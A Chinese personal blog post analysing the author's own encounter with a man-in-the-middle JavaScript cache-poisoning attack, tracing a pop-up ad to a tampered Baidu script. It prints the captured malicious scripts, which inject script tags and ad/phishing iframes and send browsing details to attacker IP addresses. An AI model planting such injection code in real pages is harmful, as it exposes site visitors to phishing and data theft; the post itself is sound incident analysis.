俗話說得好,常在河邊走,哪能不濕鞋?俗話又說了,出來混,早晚要還的。只是沒想到自己還的這么快。就在之前的
幾篇關於MITM的筆記兼科普文剛發布不久,我自己就遭遇了一次中間人攻擊。無奈由於技不如人,當時花了兩天都沒
找到原因。不過吃一塹長一智,雖然丟了點個人信息,但總算明白了對方的手法。在此記錄一下當時的排查過程,就當
是為自己作個提醒吧。
某天晚上我忙於搭建博客的時候,在某個網站下面突然發現有個巨大的廣告彈窗,上面是一張掃地機
的圖片。正好當時剛在淘寶上搜索過掃地機,對這種針對性廣告也習以為常了,只是覺得這個彈窗有點大得詭異,不過當時
正弄網站弄得頭腦興奮,於是也沒在意。
然后過了一兩天,在瀏覽網頁的時候,遇見那個掃地機彈窗的頻率也越來越頻繁,真正引起我的警惕的是,在訪問一些朋友的
個人博客時,居然也有那個廣告彈窗,而那個博客是肯定不會自己插入廣告的。這時候我才意識到,我被黑了。由於技術水平
限制,我還一時不知道是什么問題。莫非是被中毒了?由於我平時用的是Linux操作系統,所以並沒在安全防護方面花費
過多少心思,也許是被鑽了漏洞,於是馬上更新了最新版的瀏覽器,並且把操作系統的所有安全補丁也打上了。重啟電腦之后
以為肯定沒問題,結果一上網就發現了那個可惡的彈窗。於是想到也許是被劫持了,查看了ARP發現網關的MAC地址和我記錄的地址
是一樣的,然后查看DNS域名服務器:
#cat /etc/resolv.conf
是上級NAT分配的域名服務器,似乎也沒什么問題。於是先在瀏覽器上F12查看請求的詳情,發現有幾條奇怪的GET:
GET http://122.114.61.38/adjs/ad.js?undefined
GET http://211.149.216.27/fn_put/fishingnet2.jsp?siteID=2
GET http://122.114.61.38/fishingnet/js2log?jsurl=http://211.149.216.27/fn_put/fishingnet2.jsp?siteID=2
GET http://211.149.216.27/fn_put/put2.jsp?postfix=&siteID=2&isPC=false&accessUa=Mozilla/5.0%20(X11;%20Linux%20x86_64;%20rv:38.0)%20Gecko/20100101%20Firefox/38.0%20Iceweasel/38.3.0&accessIp=xx.xx.xx.xx&accessId=accessId_fnxxxxxxx&url=http%3A//iask.sina.com.cn/b/1mJivmlTavsb.html
前面一條返回了廣告彈窗的框架,並且嵌入到我正在瀏覽的窗口里。如果我點擊了那個廣告,就進入了一個釣魚網站,至於我怎么知道的……
因為看第二條,它的名字就叫fishingnet。如果只是釣魚那也算了,因為我不去咬鈎就沒事,可注意最后一條,居然把我的Cookie上傳
到攻擊者的服務器上了!真是相當惡毒啊,看樣子已經不能說是惡作劇了。看看第一次GET得到的ad.js:
/* 2014-06-20T16:23:49.295Z */!function(e,t){
if("undefined" == typeof location_sign)
{
location_sign = 'none';
}
var myids = new Array();
myids['jfhome'] = '0';
myids['cdair'] = '1';
myids['shtt2'] = '2';
myids['cqair'] = '3';
myids['xjair'] = '4';
myids['dlair'] = '5';
myids['qdair'] = '6';
myids['bjcn'] = '7';
var siteid = '-1';
if(myids.hasOwnProperty(location_sign))
{
siteid = myids[location_sign];
}
if(location_sign=='jfhome')
{
var js = document.createElement('script');
jsurl = "http://211.149.216.27:8080/fn_put/fishingnet2.jsp?siteID="+siteid;
js.setAttribute('src',jsurl);
document.body.appendChild(js);
}
else
{
var js = document.createElement('script');
jsurl = "http://211.149.216.27/fn_put/fishingnet2.jsp?siteID="+siteid;
js.setAttribute('src',jsurl);
document.body.appendChild(js);
var js1 = document.createElement('script');
var mylog = "http://122.114.61.38/fishingnet/js2log?jsurl="+jsurl;
js1.setAttribute('src',mylog);
document.body.appendChild(js1);
}
}(window,document);
第二條GET請求直接返回一個js函數:
function isPC() {
var flag = false;
var userAgentInfo = 'curl/7.26.0';
var Agents = ["Windows NT", "Macintosh"];
for (var v = 0; v < Agents.length; v++) {
if (userAgentInfo.indexOf(Agents[v]) > 0) {
flag = true;
break;
}
}
return flag;
}
var putting1 = function(){
var accessId = '';
if(window.localStorage){
if(typeof(localStorage.accessId_fn) == "undefined")
{
localStorage.accessId_fn = "accessId_fn"+new Date().getTime();
}
accessId = localStorage.accessId_fn;
}
var url = window.location.href;
var accessIp = '116.236.107.222';
var accessUa = 'curl/7.26.0';
if(top.location == location)
{
var ajax_fn = 'http://211.149.216.27/fn_put/put2.jsp?postfix=&siteID=2&isPC='+isPC()+'&accessUa='+accessUa+'&accessIp='+accessIp+'&accessId='+accessId+'&url='+escape(url);
var script = document.createElement("script");
script.src = ajax_fn;
document.body.appendChild(script);
}
}
if (typeof(isload_fn) == "undefined" || isload_fn==false) {
var isload_fn = true;
putting1();
}
第三次GET沒有返回,估計只是給服務器端的jsp傳參,最后就是以同樣的形式把我的瀏覽信息按照ajax_fn的格式送給服務器了,很惡毒對不對?
但這只是結果,從一開始請求ad.js之后,一切就脫離正軌了,我們需要找到原因,就必須再往上,開啟wireshark抓包,設置過濾條件為:
http&&(ip.addr==122.114.61.38 || ip.addr==211.149.216.27)
看看結果:
baidu_c.js是什么玩意,下載來看看:
/*! Copyright 2015 Baidu Inc. All Rights Reserved. */
; (function() {
var l = void 0,
m = !0,
o = null,
s = !1;
function v(e) {
return function() {
return e
}
}
var E = {
t1: +new Date,
t2: 0,
t3: 0,
t4: 0
},
I = ["search!"],
aa = 3,
ma = "BAIDU_DUP2_replacement",
na = "http://dup.baidustatic.com/painter/",
... //省略四千行
})();
var myDate = new Date();
var tt = myDate.getFullYear() +"_"+ myDate.getMonth() +"_"+ myDate.getDate();
document.write("<scr"+"ipt id = 'myscript' src='http://122.114.61.38/fishingnet/shtt2/baidu_h.js?"+tt+"'></scr"+"ipt>");
是個四千行左右的js腳本,開頭有baidu的版權,注意最后三行,似乎是額外添加的。也就是說我本該請求一個真正的baidu_c.js,卻被攻擊者調包了。
調包之后的js直接用document.write給我添加了點內容,恩,baidu_h.js,下載看看:
var myads = document.getElementsByName("my_adsense_kk");
var ad_loc = "shtt2";
var ad_src = "baidu_c";
if(myads)
{
//console.log(myads);
//alert(myads.length);
//for(myaddiv in myads)
//console.log(myads.length);
for(var i = 0, l = myads.length; i < l; i++)
{
//alert(myadframe.item);
//console.log("mylog");
//console.log(myads[i].id);
var content="";
murl=encodeURIComponent(window.location.href.toLowerCase());
if(!myads[i].hasChildNodes())
{
iframe = document.createElement("iframe");
iframe.setAttribute("id", "gad-iframe");
iframe.style.align = "center";
if(myads[i].id.match(/300_250/i) == "300_250")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=300&ad_height=250&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "300px";
iframe.style.height = "250px";
content="add";
}
if(myads[i].id.match(/728_90/i) == "728_90")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=728&ad_height=90&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "728px";
iframe.style.height = "90px";
content="add";
}
if(myads[i].id.match(/336_280/i) == "336_280")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=336&ad_height=280&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "336px";
iframe.style.height = "280px";
content="add";
}
if(myads[i].id.match(/960_90/i) == "960_90")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=960&ad_height=90&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "960px";
iframe.style.height = "90px";
content="add";
}
if(myads[i].id.match(/1000_90/i) == "1000_90")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=1000&ad_height=90&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "1000px";
iframe.style.height = "90px";
content="add";
}
if(myads[i].id.match(/200_200/i) == "200_200")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=200&ad_height=200&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "200px";
iframe.style.height = "2000px";
content="add";
}
if(myads[i].id.match(/250_250/i) == "250_250")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=250&ad_height=250&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "250px";
iframe.style.height = "250px";
content="add";
}
if(myads[i].id.match(/250_120/i) == "250_120")
{
iframe.src="http://122.114.61.38/fishingnet/ad.html?ad_width=250&ad_height=120&ad_src=baidu_c&ad_loc="+ad_loc+"&ad_from="+murl;
iframe.style.width = "250px";
iframe.style.height = "120px";
content="add";
}
if(content)
{
myads[i].appendChild(iframe);
}
}
}
}
在這里給我加了個ad.html的frame子標簽,至此從ad.html搞的手腳就全部應用到我的頁面上了,
在wireshark找到上傳cookie的地方,右鍵Follow TCP Stream:
果然請求都是從ad.html發出的。
至此為止,攻擊過程是清楚了,但是源頭還是沒解決。一開始訪問網站的時候,為什么請求了一個假的baidu_c.h呢?經過查找類似病例,
發現很有可能是被js緩存投毒了,其基本原理是利用一些網站的個別緩存js很久不更新且緩存時間很長的事實,對其進行污染修改。
從而導致受害者在瀏覽網站的時候與執行攻擊者插入的內容。因此把.mozilla目錄下的cache全部清空,再打開瀏覽器上網,世界終於清凈了。
后記
這次中招突如其來,如果不是彈窗太突兀,整個中間人攻擊的過程還是相當隱秘的,其背后還好是個以釣魚為目的的黑產鏈,若是單純的監控或者做小手腳,
一般人根本無法察覺,真是細思恐極。而且這種攻擊是基於緩存的行為,殺毒軟件一般都無法檢測。網絡世界像黑暗森林一樣野蠻無情,
掌握點基本技能保護自己還是很必要的。
歡迎交流,文章轉載請注明出處.